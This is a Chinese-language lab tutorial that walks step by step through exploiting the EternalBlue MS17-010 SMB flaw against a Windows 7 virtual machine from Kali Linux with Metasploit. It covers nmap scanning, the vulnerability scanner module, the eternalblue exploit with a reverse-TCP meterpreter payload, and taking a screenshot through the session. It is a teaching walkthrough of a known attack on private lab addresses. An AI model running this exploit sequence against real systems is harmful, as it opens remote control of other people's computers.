永恒之蓝 | 您所在的位置:网站首页 › 漏洞利用过程会有哪些困难 › 永恒之蓝 |
该漏洞是通过目标主机445端口开放的情况,可以发起攻击 在VMware上建立两个虚拟机:win7和kali Kali:它是Linux发行版的操作系统,它拥有超过300个渗透测试工具,就不用自己再去找安装包,去安装到我们自己的电脑上了,毕竟自己从网上找到,也不安全。它甚至还集成了600多种黑客工具,很强大。 可以永久免费使用,基本上学黑客攻击必会用到这个系统 靶机:Win7 64位 (IP: 192.168.10.22)--用ipconfig进行查询 攻击机:Kali 64位 (IP:192.168.10.21)--用ifconfig进行查询 1、实验环境前提条件:win7中,关闭防火墙(“打开网络和共享中心”-“Windows防火墙”-“打开或关闭Windows防火墙”-均选择关闭选项)保证两个虚拟机是可以ping通的(尤其是在kali中去ping win7,看能否连通) >ping 192.168.10.222、靶机端口探测使用nmap对靶机端口服务进行扫描,可以查看到目标主机是否存活,以及端口开放情况 >nmap 192.168.10.22结果探测到:目标主机存活,且445端口开放,永恒之蓝漏洞就是利用445端口的smb服务,操作系统的溢出漏洞进行攻击的 3、打开Metasploit渗透工具(Metasploit是一款开源的安全漏洞检测工具,msfconsole用于启动msf终端) >msfconsole结果:成功进入,进入到"msf6>“的模式下 4、查看需要利用的漏洞搜索永恒之蓝漏洞,漏洞编号为ms17-010 【补充:Windows系统漏洞微软的漏洞编号命名格式为:MS17-010; MS Micosoft的缩写,固定格式;17 表示年份,即2017年发布的漏洞;010 表示顺序,即当年度发布的第10个漏洞。 >search ms17-010结果:可以看到返回了多条可利用的漏洞模块信息 5、尝试利用其中一个漏洞模块进行攻击先使用辅助扫描测试模块-04模块,进入模块中,测试目标主机是否容易受到ms17-010漏洞的攻击(注意:必须是“_”,不是“-”,否则会报错) >use auxiliary/scanner/smb/smb_ms17_010结果:成功切换到这个模块之下--”msf6 auxiliary(scanner/smb/smb_ms17_010)>“ 6、查看该漏洞模块所需的参数情况进到这个漏洞模块之后,先查看该测试模块的参数情况。类似于你使用一软件,进行攻击,是不是需要先进行一些简单的参数配置啊,需要告诉软件,要向谁发起攻击吧,这是最最基本的,所以,要配置,就要先查看都可以配置哪些参数? >show options结果展示:其中required显示的值为yes的,代表是必须要设置的项;显示的值为no的,代表是不必须要设置的项; 重点关注2个参数配置,需要设置哪个就设置哪个: RHOST(被攻击的目标地址-win7地址); RPORT(被攻击目标地址的端口-保证445开放); 7、设置目标主机地址查看完了,发现只有RHOST等待设置,其他(RPORT)均以自动获取,没有问题。就可以设置被攻击的目标主机地址-win7 >set RHOST 192.168.10.228、设置好了之后,再进行检验>show options9、检查没问题了,发起攻击>run扫描结果:“Host is likely VULNERABLE to MS17-010”-该主机很容易受到ms17-010的攻击,可以断定目标存在漏洞 10、尝试利用另一个漏洞模块进行攻击同利用辅助扫描测试模块的步骤,大同小异,使用另一个漏洞攻击模块-0模块,进行攻击 10.1)查看需要利用的漏洞 >search ms17-01010.2)进入0模块,尝试攻击 >use exploit/windows/smb/ms17_010_eternalblue结果展示:成功切换到这个模块之下--”msf6 exploit(windows/smb/ms17_010_eternalblue)>“ 并提示“no payload configured,defaulting to windows/x64/meterpreter/reverse_tcp”--没有配置payload,默认为 windows/x64/meterpreter/reverse_tcp 10.3)查看参数配置情况 >show options重点关注5个参数配置,需要设置哪个就设置哪个: Payload(攻击载体) ; RHOST(被攻击的目标地址-win7地址); RPORT(被攻击目标地址的端口-保证445开放); LHOST(发起攻击的地址-kali地址); LPORT(发起攻击的端口-默认即可); 【补充说明: 1)Payload中包含有需要在远程系统中运行的恶意代码,Payload是一种特殊模块,它们能够以漏洞利用模块运行,并能够利用目标系统中的安全漏洞实施攻击。也就是说,漏洞利用模块可以访问目标系统,而其中的代码定义了Payload在目标系统中的行为。 2)Payload模块主要有以下三种类型:-Single -Stager -Stage Single是一种完全独立的Payload,实现的目的也简单,但容易被捕捉到。Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。 一种常见的Stagers Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接(3次握手-4次挥手)(是一个基于TCP的反向链接反弹shell, 使用起来很稳定)。Stage是Stager Payload下载的一种Payload组件,这种Payload可以提供更加高级的功能,而且没有大小限制。3)windows/x64/meterpreter/reverse_tcp则由一个Stager Payload(reverse_tcp)和一个Stage Payload(meterpreter)组成。 【注意:Payload为windows/meterpreter/reverse_tcp 默认获取到的控制通道meterpreter为32位, 如果想将之后获取到的控制通道meterpreter改为64位,则设置payload:windows/x64/meterpreter/reverse_tcp】 10.4)设置目标主机地址 发现仅RHOST为空待设置,其它(payload/RPORT/LHOST/LPORT)均已获取,且正确,就可以设置被攻击的目标主机地址-win7 >set RHOST 192.168.10.2210.5)再次进行检查 >show options10.6)检查无误后,发起攻击 >run结果显示:“meterpreter session 1 opened”--表明已经开通一个会话连接 11、攻击成功 一旦开通一个会话连接侯,系统一般会自动返回一个控制通道meterpreter,表明攻击成功 meterpreter>当然,若没有自动连接,也可以进行手动连接: >sessions -i 112、屏幕截图 可以在这个通道中执行一些控制目标主机win7的命令,如抓取win7的桌面截图screenshot,截图一般会自动保存到桌面的主文件夹里面 meterpreter>screenshot13、终止会话 可以退出攻击,断开连接,会退出切换到”msf6 exploit(windows/smb/ms17_010_eternalblue)>“下,并再次查看当前存在的会话sessions,发现没有任何会话开启 meterpreter>exit meterpreter>sessions |
CopyRight 2018-2019 实验室设备网 版权所有 |